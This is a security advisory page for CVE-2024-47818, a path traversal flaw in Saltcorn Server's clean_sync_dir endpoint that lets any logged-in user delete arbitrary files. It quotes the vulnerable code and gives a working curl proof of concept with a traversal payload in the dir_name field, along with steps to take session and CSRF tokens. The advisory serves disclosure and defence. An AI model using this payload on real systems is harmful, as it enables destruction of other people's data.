Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS00M2YzLWg2M3ctcDZmNs4ABAA3

Saltcorn Server allows logged-in users to delete arbitrary files because of a path traversal vulnerability

Summary

A logged-in user with any role can delete arbitrary files on the filesystem by calling the sync/clean_sync_dir endpoint. The dir_name POST parameter is not validated/sanitized and is used to construct the syncDir that is deleted by calling fs.rm.

Details

file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.15/packages/server/routes/sync.js#L337-L346

router.post(
  "/clean_sync_dir",
  error_catcher(async (req, res) => {
    const { dir_name } = req.body; // [1] source
    try {
      const rootFolder = await File.rootFolder();
      const syncDir = path.join(
        rootFolder.location,
        "mobile_app",
        "sync",
        dir_name // [2]
      );
      await fs.rm(syncDir, { recursive: true, force: true }); // [3] sink
      res.status(200).send("");
    } catch (error) {
      getState().log(2, `POST /sync/clean_sync_dir: '${error.message}'`);
      res.status(400).json({ error: error.message || error });
    }
  })
);

PoC

The following PoC can be executed with a user with any role (admin, staff, user, public)

create a file in a folder different from where the server is started:

touch /tmp/secret
cat /tmp/secret

log with a user and retrieve valid connect.sid and _csrf values***
send the following curl request

curl -i -X $'POST' \
  -H $'Host: localhost:3000' \
  -H $'Content-Type: application/x-www-form-urlencoded' \
  -H $'Content-Length: 93' \
  -H $'Origin: http://localhost:3000' \
  -H $'Connection: close' \
  -b $'connect.sid=VALID_CONNECT_SID_COOKIE; loggedin=true' \
  --data-binary $'_csrf=VALID_CSRF_VALUE&dir_name=/../../../../../../../../../../tmp/secret' \
  $'http://localhost:3000/sync/clean_sync_dir'

check if the file previously created does not exist anymore:

cat /tmp/secret
cat: /tmp/secret: No such file or directory

*** obtain connect.sid and _csrf values

A possible way to retrieve connect.sid and _csrf values is to use the password reset functionality:

log in
open the browser developer console, go to the Network tab filter for settings request
visit http://localhost:3000/auth/settings
trigger the change password functionality
under the Headers and Request tabs, grab the connect.sid and _csrf values and replace them in the curl command

Impact

Arbitrary file delete

Recommended Mitigation

Resolve the syncDir and check if it starts with rootFolder.location/mobile_app/sync.

Permalink: https://github.com/advisories/GHSA-43f3-h63w-p6f6
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS00M2YzLWg2M3ctcDZmNs4ABAA3
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 11 days ago
Updated: 10 days ago

CVSS Score: 6.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Identifiers: GHSA-43f3-h63w-p6f6, CVE-2024-47818
References:

Repository: https://github.com/saltcorn/saltcorn
Blast Radius: 7.2

Affected Packages

npm:@saltcorn/server

Dependent packages: 8
Dependent repositories: 13
Downloads: 3,622 last month
Affected Version Ranges: <= 1.0.0-beta.15
Fixed in: 1.0.0-beta.16
All affected versions: 0.0.2, 0.0.3, 0.0.4, 0.0.5, 0.0.6, 0.0.7, 0.0.8, 0.0.9, 0.1.0, 0.1.1, 0.1.2, 0.1.3, 0.1.4, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.3.0, 0.3.1, 0.3.2, 0.3.3, 0.3.4, 0.3.5, 0.4.0, 0.4.1, 0.4.2, 0.4.3, 0.4.4, 0.4.5, 0.5.0, 0.5.1, 0.5.2, 0.5.3, 0.5.4, 0.5.5, 0.5.6, 0.6.0, 0.6.1, 0.6.2, 0.6.3, 0.6.4, 0.7.0, 0.7.1, 0.7.2, 0.7.3, 0.7.4, 0.8.0, 0.8.1, 0.8.2, 0.8.3, 0.8.4, 0.8.5, 0.8.6, 0.8.7, 0.8.9, 0.9.0, 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5, 0.9.6, 0.9.7, 0.9.8, 1.0.0-beta.0, 1.0.0-beta.1, 1.0.0-beta.2, 1.0.0-beta.3, 1.0.0-beta.4, 1.0.0-beta.5, 1.0.0-beta.6, 1.0.0-beta.7, 1.0.0-beta.8, 1.0.0-beta.9, 1.0.0-beta.10, 1.0.0-beta.11, 1.0.0-beta.13, 1.0.0-beta.14, 1.0.0-beta.15
All unaffected versions: